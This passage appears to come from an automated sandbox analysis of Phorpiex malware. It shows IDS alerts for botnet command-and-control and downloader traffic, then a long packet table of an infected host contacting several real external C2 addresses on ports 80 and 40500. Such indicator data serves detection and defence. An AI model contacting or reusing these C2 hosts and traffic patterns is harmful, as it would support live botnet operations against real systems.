                                            2024-09-17T23:12:38.729098+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982191.202.233.14180TCP
                                            2024-09-17T23:12:38.848779+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145149.54.47.9040500UDP
                                            2024-09-17T23:12:41.467262+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982391.202.233.14180TCP
                                            2024-09-17T23:12:41.467262+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982391.202.233.14180TCP
                                            2024-09-17T23:12:44.777939+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982591.202.233.14180TCP
                                            2024-09-17T23:12:44.777939+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982591.202.233.14180TCP
                                            2024-09-17T23:12:47.533845+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982691.202.233.14180TCP
                                            2024-09-17T23:12:47.533845+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982691.202.233.14180TCP
                                            2024-09-17T23:12:51.407501+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449828185.215.113.6680TCP
                                            2024-09-17T23:12:51.407501+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449828185.215.113.6680TCP
                                            2024-09-17T23:12:53.879963+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145188.215.175.8940500UDP
                                            2024-09-17T23:12:54.150335+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449829185.215.113.6680TCP
                                            2024-09-17T23:12:54.150335+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449829185.215.113.6680TCP
                                            2024-09-17T23:12:56.871465+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449831185.215.113.6680TCP
                                            2024-09-17T23:12:56.871465+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449831185.215.113.6680TCP
                                            2024-09-17T23:12:58.897691+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145100.109.48.4340500UDP
                                            2024-09-17T23:12:59.607090+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449832185.215.113.6680TCP
                                            2024-09-17T23:12:59.607090+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449832185.215.113.6680TCP
                                            2024-09-17T23:13:02.354191+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449834185.215.113.6680TCP
                                            2024-09-17T23:13:02.354191+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449834185.215.113.6680TCP
                                            2024-09-17T23:13:05.072325+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449836185.215.113.6680TCP
                                            2024-09-17T23:13:05.072325+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449836185.215.113.6680TCP
                                            2024-09-17T23:13:09.923770+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44983777.91.77.9280TCP
                                            2024-09-17T23:13:09.923770+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44983777.91.77.9280TCP
                                            2024-09-17T23:13:13.779440+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44983977.91.77.9280TCP
                                            2024-09-17T23:13:13.779440+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44983977.91.77.9280TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 17, 2024 23:09:15.563776970 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:15.568891048 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:15.569032907 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:15.569209099 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:15.574179888 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.259267092 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.259324074 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.259356022 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.259430885 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:16.259430885 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:16.259430885 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:16.259716988 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.259732008 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.259747982 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.259908915 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:16.259910107 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:16.260427952 CEST8049730185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:16.260624886 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:16.263004065 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:16.263041019 CEST4973080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.269658089 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.274545908 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.274611950 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.274733067 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.279483080 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.984699965 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.984724045 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.984756947 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.984778881 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.984824896 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.985251904 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.985268116 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.985284090 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.985316992 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.985316992 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.985337019 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:17.985702038 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:17.985749960 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:18.072895050 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:18.072948933 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:18.093730927 CEST4973340500192.168.2.45.234.221.184
                                            Sep 17, 2024 23:09:18.098836899 CEST40500497335.234.221.184192.168.2.4
                                            Sep 17, 2024 23:09:18.098906040 CEST4973340500192.168.2.45.234.221.184
                                            Sep 17, 2024 23:09:18.100330114 CEST4973340500192.168.2.45.234.221.184
                                            Sep 17, 2024 23:09:18.105200052 CEST40500497335.234.221.184192.168.2.4
                                            Sep 17, 2024 23:09:18.105262041 CEST4973340500192.168.2.45.234.221.184
                                            Sep 17, 2024 23:09:18.110084057 CEST40500497335.234.221.184192.168.2.4
                                            Sep 17, 2024 23:09:20.232733965 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.233184099 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.237736940 CEST4973340500192.168.2.45.234.221.184
                                            Sep 17, 2024 23:09:20.238115072 CEST8049732185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.238131046 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.238190889 CEST4973280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.238241911 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.238425970 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.243248940 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.285351038 CEST40500497335.234.221.184192.168.2.4
                                            Sep 17, 2024 23:09:20.952914000 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953022003 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.953231096 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953250885 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953280926 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.953288078 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953299999 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953336954 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.953783035 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953793049 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953804970 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:20.953808069 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.953828096 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:20.953847885 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:21.039796114 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:21.039861917 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:23.163697958 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:23.168615103 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:23.386266947 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:23.386341095 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:25.238234997 CEST4973640500192.168.2.477.244.144.31
                                            Sep 17, 2024 23:09:25.243275881 CEST405004973677.244.144.31192.168.2.4
                                            Sep 17, 2024 23:09:25.243546009 CEST4973640500192.168.2.477.244.144.31
                                            Sep 17, 2024 23:09:25.244862080 CEST4973640500192.168.2.477.244.144.31
                                            Sep 17, 2024 23:09:25.249689102 CEST405004973677.244.144.31192.168.2.4
                                            Sep 17, 2024 23:09:25.249753952 CEST4973640500192.168.2.477.244.144.31
                                            Sep 17, 2024 23:09:25.254558086 CEST405004973677.244.144.31192.168.2.4
                                            Sep 17, 2024 23:09:25.442640066 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:25.447555065 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:25.664438009 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:25.665035009 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:27.174693108 CEST405004973677.244.144.31192.168.2.4
                                            Sep 17, 2024 23:09:27.176961899 CEST4973640500192.168.2.477.244.144.31
                                            Sep 17, 2024 23:09:27.692382097 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:27.697344065 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:27.915556908 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:27.916076899 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:29.942568064 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:29.947510958 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:30.163774967 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:30.163885117 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:32.192881107 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:32.198102951 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:32.414632082 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:09:32.414764881 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:09:35.253098965 CEST4973640500192.168.2.477.244.144.31
                                            Sep 17, 2024 23:09:35.258114100 CEST405004973677.244.144.31192.168.2.4
                                            Sep 17, 2024 23:09:35.459579945 CEST4973880192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:35.464518070 CEST804973877.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:35.464708090 CEST4973880192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:35.464857101 CEST4973880192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:35.469899893 CEST804973877.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:37.130520105 CEST804973877.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:37.130578041 CEST4973880192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:37.130789042 CEST4973880192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:37.135792017 CEST804973877.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:39.236645937 CEST4974180192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:39.241666079 CEST804974177.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:39.241735935 CEST4974180192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:39.241875887 CEST4974180192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:39.246900082 CEST804974177.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:39.473566055 CEST40500497335.234.221.184192.168.2.4
                                            Sep 17, 2024 23:09:39.473638058 CEST4973340500192.168.2.45.234.221.184
                                            Sep 17, 2024 23:09:40.269583941 CEST4974240500192.168.2.4178.88.111.20
                                            Sep 17, 2024 23:09:40.274568081 CEST4050049742178.88.111.20192.168.2.4
                                            Sep 17, 2024 23:09:40.274672031 CEST4974240500192.168.2.4178.88.111.20
                                            Sep 17, 2024 23:09:40.275899887 CEST4974240500192.168.2.4178.88.111.20
                                            Sep 17, 2024 23:09:40.280750990 CEST4050049742178.88.111.20192.168.2.4
                                            Sep 17, 2024 23:09:40.280810118 CEST4974240500192.168.2.4178.88.111.20
                                            Sep 17, 2024 23:09:40.285587072 CEST4050049742178.88.111.20192.168.2.4
                                            Sep 17, 2024 23:09:40.900562048 CEST804974177.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:40.900662899 CEST4974180192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:40.900841951 CEST4974180192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:40.905638933 CEST804974177.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:42.926588058 CEST4974380192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:42.931639910 CEST804974377.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:42.931755066 CEST4974380192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:42.938610077 CEST4974380192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:42.943389893 CEST804974377.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:44.587136030 CEST804974377.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:44.587313890 CEST4974380192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:44.587315083 CEST4974380192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:44.592247963 CEST804974377.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:46.615981102 CEST4974480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:46.621100903 CEST804974477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:46.621326923 CEST4974480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:46.621805906 CEST4974480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:46.626660109 CEST804974477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:48.275198936 CEST804974477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:48.275269032 CEST4974480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:48.275342941 CEST4974480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:48.280754089 CEST804974477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:50.293888092 CEST4974240500192.168.2.4178.88.111.20
                                            Sep 17, 2024 23:09:50.341404915 CEST4050049742178.88.111.20192.168.2.4
                                            Sep 17, 2024 23:09:50.343878984 CEST4974580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:50.350383043 CEST804974577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:50.350572109 CEST4974580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:50.351401091 CEST4974580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:50.357728004 CEST804974577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:52.012217999 CEST804974577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:52.012408018 CEST4974580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:52.012408018 CEST4974580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:52.020997047 CEST804974577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:54.065993071 CEST4974680192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:54.082371950 CEST804974677.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:54.082577944 CEST4974680192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:54.083096027 CEST4974680192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:54.091000080 CEST804974677.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:55.285393953 CEST4974740500192.168.2.459.91.192.118
                                            Sep 17, 2024 23:09:55.290381908 CEST405004974759.91.192.118192.168.2.4
                                            Sep 17, 2024 23:09:55.290498972 CEST4974740500192.168.2.459.91.192.118
                                            Sep 17, 2024 23:09:55.291790962 CEST4974740500192.168.2.459.91.192.118
                                            Sep 17, 2024 23:09:55.296617031 CEST405004974759.91.192.118192.168.2.4
                                            Sep 17, 2024 23:09:55.296664000 CEST4974740500192.168.2.459.91.192.118
                                            Sep 17, 2024 23:09:55.301600933 CEST405004974759.91.192.118192.168.2.4
                                            Sep 17, 2024 23:09:55.741707087 CEST804974677.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:55.742140055 CEST4974680192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:55.742233992 CEST4974680192.168.2.477.91.77.92
                                            Sep 17, 2024 23:09:55.747345924 CEST804974677.91.77.92192.168.2.4
                                            Sep 17, 2024 23:09:58.792392015 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:58.797909975 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:58.797986031 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:58.798137903 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:58.803256035 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523145914 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523197889 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523233891 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523266077 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523300886 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523334026 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523346901 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523346901 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523346901 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523346901 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523391962 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523413897 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523448944 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523463964 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523482084 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523494005 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523516893 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.523525000 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.523567915 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.524064064 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.524091959 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.528557062 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.528633118 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:09:59.529177904 CEST804974891.202.233.141192.168.2.4
                                            Sep 17, 2024 23:09:59.529226065 CEST4974880192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:00.535502911 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:00.540616035 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:00.540713072 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:00.540867090 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:00.546055079 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236260891 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236279011 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236289978 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236361027 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236372948 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236382961 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236394882 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236542940 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.236542940 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.236542940 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.236542940 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.236784935 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236805916 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236819029 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.236850977 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.236851931 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.236876011 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.241662025 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:01.241736889 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:01.647906065 CEST4050049742178.88.111.20192.168.2.4
                                            Sep 17, 2024 23:10:01.647968054 CEST4974240500192.168.2.4178.88.111.20
                                            Sep 17, 2024 23:10:02.416474104 CEST8049734185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:10:02.416660070 CEST4973480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:10:02.456315994 CEST4974740500192.168.2.459.91.192.118
                                            Sep 17, 2024 23:10:02.505671024 CEST405004974759.91.192.118192.168.2.4
                                            Sep 17, 2024 23:10:07.443656921 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.449881077 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.473944902 CEST4975040500192.168.2.4149.54.35.210
                                            Sep 17, 2024 23:10:07.478907108 CEST4050049750149.54.35.210192.168.2.4
                                            Sep 17, 2024 23:10:07.479087114 CEST4975040500192.168.2.4149.54.35.210
                                            Sep 17, 2024 23:10:07.481427908 CEST4975040500192.168.2.4149.54.35.210
                                            Sep 17, 2024 23:10:07.487147093 CEST4050049750149.54.35.210192.168.2.4
                                            Sep 17, 2024 23:10:07.487250090 CEST4975040500192.168.2.4149.54.35.210
                                            Sep 17, 2024 23:10:07.492003918 CEST4050049750149.54.35.210192.168.2.4
                                            Sep 17, 2024 23:10:07.663274050 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663392067 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663399935 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663407087 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663414955 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663423061 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663501024 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.663501024 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.663593054 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.663840055 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663887024 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.663914919 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.663994074 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.665338039 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.665374041 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:07.670383930 CEST804974991.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:07.670490026 CEST4974980192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:08.676172018 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:08.681221008 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:08.681338072 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:08.681487083 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:08.686305046 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219350100 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219369888 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219382048 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219425917 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:10.219508886 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:10.219510078 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219521046 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219531059 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219542027 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219561100 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:10.219594955 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:10.219670057 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219680071 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219687939 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.219722986 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:10.219790936 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:10.220110893 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.220153093 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:10.223161936 CEST804975191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:10.223221064 CEST4975180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:11.097090960 CEST4975040500192.168.2.4149.54.35.210
                                            Sep 17, 2024 23:10:11.145642042 CEST4050049750149.54.35.210192.168.2.4
                                            Sep 17, 2024 23:10:15.943464994 CEST4975280192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:15.948740005 CEST804975291.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:15.948940992 CEST4975280192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:15.953558922 CEST4975280192.168.2.491.202.233.141
                                            Sep 17, 2024 23:10:15.958656073 CEST804975291.202.233.141192.168.2.4
                                            Sep 17, 2024 23:10:16.119915009 CEST4975340500192.168.2.495.212.18.41
                                            Sep 17, 2024 23:10:16.125118017 CEST405004975395.212.18.41192.168.2.4
                                            Sep 17, 2024 23:10:16.125248909 CEST4975340500192.168.2.495.212.18.41
                                            Sep 17, 2024 23:10:16.127315044 CEST4975340500192.168.2.495.212.18.41
                                            Sep 17, 2024 23:10:16.132885933 CEST405004975395.212.18.41192.168.2.4
                                            Sep 17, 2024 23:10:16.132981062 CEST4975340500192.168.2.495.212.18.41
